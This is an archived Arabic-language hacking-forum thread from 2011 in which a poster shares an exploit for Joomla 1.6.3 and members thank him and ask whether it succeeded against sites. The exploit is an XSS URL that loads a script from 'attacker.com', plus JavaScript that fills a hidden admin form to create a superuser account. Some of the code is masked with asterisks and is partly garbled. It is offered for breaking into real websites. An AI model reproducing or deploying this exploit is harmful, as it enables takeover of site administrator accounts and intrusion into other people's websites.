:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   آخر ثغرات الجوملة (http://www.vbspiders.com/vb/t50906.html)

Dr.Mix 07-06-2011 08:13 PM
آخر ثغرات الجوملة
 
سلام يا اخوان كيفكم ان شاء الله بالف خير

اليوم جايب لكم اخر الثغرات في الجوملة

كود PHP:
This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.
***65279;
/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
 
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>
 
*/
********.writeln('<****** id="******" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></******>');
 
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
 
********.getElementById("******").content********.forms[0].jform_name.value name;
********.getElementById("******").content********.forms[0].jform_username.value username;
********.getElementById("******").content********.forms[0].jform_password.value password;
********.getElementById("******").content********.forms[0].jform_password2.value password;
********.getElementById("******").content********.forms[0].jform_email.value email;
********.getElementById("******").content********.forms[0].getElementById("1group_8").checked=true;
********.getElementById("******").content********.getElementsByTagName("a")[11].onclick(); 
طبق هادا على الموقع المصاب :
index.php?option=com_contact&view=category&catid=2 6&id=36&Itemid=-1

ان شاء الله تكون شغالة

اخوكم الهكر المحشش(Haboubamix) :lol:

ViRuS Qalaa 07-06-2011 08:15 PM
مشكور اخي ع الثغرة

JetLi 07-06-2011 09:04 PM
ارجو الرفع في المرفقات لان المنتدى يحجب بعض الاكواد

Dr.Mix 07-07-2011 01:54 AM
لقد تم يا اخي الرفع في 4shared

http://www.4shared.com/get/V1OomLZi/...spiders--.html

fantasy--xX 07-07-2011 02:09 AM
اخوي انا مبتدئ لكن لما القى الموقع المصاب واحط الثغرة واروح مصدر الصفحة ما القى اللي تقول عليها

اعذرني اذا انا غلطان لاني مبتدئ جدا جدا ما اعرف غير ثغرة السكيول الكلاسيكية :)

Dr.Mix 07-07-2011 02:43 AM
اخي والله ما فهمت اي شيئ في كلامك المرجوا التفسير اخي

vpn_31 07-07-2011 03:30 AM
تسلم عطرح سغره

4nT! H3lL 07-08-2011 04:54 PM
شكرا ع الثغره

dahapp 07-09-2011 06:17 AM
مشكور ياغالى

bayrem23 07-09-2011 07:08 AM
مشكور ياغالى

migamix 07-09-2011 03:22 PM
أين سكريب الجافا تاع الاستغلال ؟؟ joom163.js
http://attacker.com/joom163.js
سآل من فضلك
هل جربت التغرة علي أحد المواقع ؟؟؟
وهل نجحت في الاقتحام
أرجو الرد أخي
في انتضارك

DR.THMoORY 07-14-2011 03:17 PM
صراحه سكربت جوملا زادت ثغراته كتير.. وكل واحده اقوى من التانيه..
يسلمو حبيبي على الثغره :)

Mr.Louai 07-14-2011 03:23 PM
مشكور ياغالى

hack!n9 07-19-2011 05:23 AM
ارجو توضيح لتغرة لانها غير وادحة وباقي في غمود


الساعة الآن 10:50 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0